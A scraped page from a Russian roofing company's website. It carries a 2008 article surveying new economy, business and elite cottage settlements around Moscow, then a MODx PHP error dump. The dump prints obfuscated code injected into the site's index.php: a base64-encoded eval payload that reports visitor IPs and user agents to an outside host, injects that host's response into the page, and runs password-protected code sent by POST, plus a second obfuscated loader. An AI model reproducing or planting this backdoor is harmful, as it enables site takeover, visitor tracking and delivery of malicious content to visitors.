Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

10.07.2008

Новые особенности подмосковных поселков

Какой поселок самый лучший? Трудно сказать… Ведь понятие «лучший» у каждого свое. У одних загородное жилье – это домик в лесу, другие, наоборот, предпочитают жить у воды. Третьи готовы купить дом в мегапроекте, четвертые предпочитают уединение и ищут коттедж в небольшом клубном поселке. Итак, что же нового сегодня на рынке загородной недвижимости?

Сегмент эконом-класса
Photobucket«Доля эконом-класса на рынке подмосковной недвижимости постоянно растет, – комментирует Игорь Лебедев, начальник отдела анализа рынка компании «Масштаб». – Это связано с тем, что за одну и ту же сумму можно приобрести квартиру в спальном районе Москвы и домик за городом. Довольно часто поселок, заявленный как дачный, используется как постоянное место жительства, поскольку качество строительства, теплоизоляция и инфраструктура позволяют использовать такой дом в качестве основного».

В этом секторе достаточно много новинок. Это и поселок эконом-класса Бачуринский Лес, и замечательно сформированный и структурированный Светлый, и небольшой, но очень уютный Цветик-Семицветик и много других. Хотя о некоторых из них хотелось бы поговорить более подробно.

Русские Узоры, состоящие из канадских домиков, обосновались на 78-м километре по Калужскому шоссе. Поселок окружен прекрасным лесом, рядом церковь и пруд. Не забыли планировщики и про инфраструктуру. На территории – магазин, кафе и центр досуга. Дома от 100 до 250 кв. м и самых разных планировок приятно удивят, прежде всего ценой. Самые дешевые – $100 тыс.

Еще более интересное предложение – поселок Papillon. Всего 17 км от Москвы по Носовихинскому или Горьковскому шоссе. Более 250 домов и 60 таунхаусов объединены в комплекс с детскими садами, школой, парком, торгово-развлекательным комплексом и больницей. Домики площадью от 200 «квадратов» и с 20 сотками земли строятся с учетом индивидуальных пожеланий заказчиков. Светлые и просторные квартиры в таунхаусах и прилегающие к этим домам участки смогут удовлетворить спрос даже очень требовательных заказчиков. Стоимость от $300 тыс.

Стиль старого европейского города передан в поселке Ивакино-Покровское. Классическая архитектура соседствует с новейшими технологическими разработками в области строительства. Сравнительно низкая цена делает этот поселок интересным для людей со средним достатком. До Москвы примерно 10 километров по Ленинградскому шоссе. Мощная инфраструктура с комбинатами бытового обслуживания, детскими площадками, медицинским пунктом, детским садом и кафе.

Бизнес-класс
Photobucket«В отличие от эконома, бизнес-класс выдвигает значительно большие требования к эстетической и экологической стороне поселка, – поясняет Елена Буравцова, пресс-секретарь компании «Домострой». – Прекрасные поселки Новотроицкое и Вороново, Идиллия и Гайдпарк предоставляют жителям возможность насладиться красотой окружающего ландшафта. Тем не менее в этот ландшафт органично вписываются инфраструктурные сооружения и коммуникации. Так, одним из образцов качественного бизнес-класса может стать Высокий Берег, который расположился на берегу Истринского водохранилища в 55 км от Москвы. Шикарный пляж, фитнес-центр, рестораны и магазины. Участки от 15 соток до одного гектара и коттеджи от 250 до 500 кв. м удовлетворят самых требовательных покупателей. Этот поселок сегодня – предмет пристального внимания инвесторов».

Еще более живописный поселок бизнес-класса – Альпийская Деревня, 45 км от Москвы по Дмитровскому шоссе. Жителям, чтобы оказаться на горнолыжном европейском курорте, достаточно просто выйти из купленного дома. Около 60 домов связаны единой курортной, праздничной инфраструктурой.

Еще один проект привлекает покупателей оригинальностью концепции – это поселок Баден-Баден. Немецкая деревушка с интересными в архитектурном плане проектами, которых предлагается пять, не считая таунхаусов. Здесь запланирована большая зона отдыха и развитая инфраструктура.

Интересна новая, более четко проявляющаяся в этом году тенденция: девелоперы все чаще делают ставку на деревянное зодчество, причем в современном европейском стиле. Поселок Истринские Холмы, расположенный в 55 км от МКАД по Новорижскому шоссе, состоит из 27 деревянных домов площадью от 240-600 кв. м. Эти дома будут изготовлены по одной из самых современных технологий – фахверк («Собственник» расскажет об этой технологии подробнее чуть позже). Как отмечает Наталья Баскаева, коммерческий директор компании «АРМ-Строй» (специализирующейся на строительстве деревянных домов), девелоперы все чаще выбирают более дорогую древесину для строительства, в частности используется клееный брус из лиственницы, которая по своим прочностным характеристикам мало уступает очень дорогому дубу. Но это уже скорее будут дома в более высоком классе.

Элит-класс
В элит-классе представлено также достаточно большое количество поселков, достойных занять первые места любых хит-парадов недвижимости. Это не только экологически чистые, удобные районы, но и изысканность, широта и совершеннейшая уникальность проектов и решений.

«Грин Парк и Primevill, Бачурино, M.O.N.A.K.О.V.O. и Времена Года готовы удивить будущих жителей, – рассказывает Владимир Яхонтов, заместитель генерального директора компании «Миэль – Загородная недвижимость». – Среди поселков элитного типа выделяется поселок в 27 километрах от Москвы по Дмитровскому направлению M.O.N.A.K.О.V.O. на берегу Икшинского водохранилища.

PhotobucketОбщая площадь проекта 16,28 га. В поселке 51 коттедж класса люкс площадью от 498 до 1038 кв. м. Размер придомовых участков от 18 до 56 соток. Проект поселка разработан известным российским архитектором Александром Цимайло. В основу архитектурной концепции положены идеи американского архитектора-модерниста середины ХХ Фрэнка Ллойда Райта. Каждое здание поселка индивидуально, но при этом сочетается с существующим природным ландшафтом. Все коттеджи двухуровневые, с цокольным этажом, со свободной планировкой. Расстояние от домов до береговой линии составляет всего 100 метров. Минимальная цена строения в поселке 40 млн руб.».

Переместимся к Можайскому водохранилищу и попадем во фламандскую деревню Сосновые Берега. Эта прекрасная, легкая композиция с остроконечными крышами и технологиями, дошедшими до нас из глубины веков и модернизированными сегодня. Собственный пляж и яхт-клуб, детские площадки, корты и рестораны – все структурировано наилучшим образом для жизни людей, понимающих толк в отдыхе и искусстве. Сосновые Берега уже в конце прошлого года начали продавать коттеджи, и спрос на них достаточно высок. Стоимость от $2 млн.

И наконец, поселок премиум-класса Папушево на Рублево-Успенском шоссе, 24-й километр. Блеск района перекрывают разве что элитные усадьбы Сады Майендорфа и Евразия. Папушево сегодня является эталоном элитного жилья. Почти 200 домов площадью до 1000 кв. м будут расположены на участках от 15 соток до 1 га. Стоимость этих произведений искусства от $2 млн до $4,5 млн. Прекрасная работа Вадима Генделя стала заключительным аккордом в нашем сегодняшнем обзоре.

Мы видим, что загородное жилье во всех направлениях развивается очень динамично. Появляются новые тенденции, меняются предпочтения покупателей, и благодаря этому архитекторы, строители, инвесторы видят сегодня далеко идущую перспективу развития этого сегмента рынка недвижимости. А для покупателя открываются уникальные возможности изменить качество жизни. Найти поселок по душе смогут как рядовые граждане, так и те, чьи имена прочно укрепились в списках самых богатых людей планеты.

По материалам сайта www.techsuz.ru

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0045 s(2 Requests)
  PHP: 0.2561 s 
  Total: 0.2606 s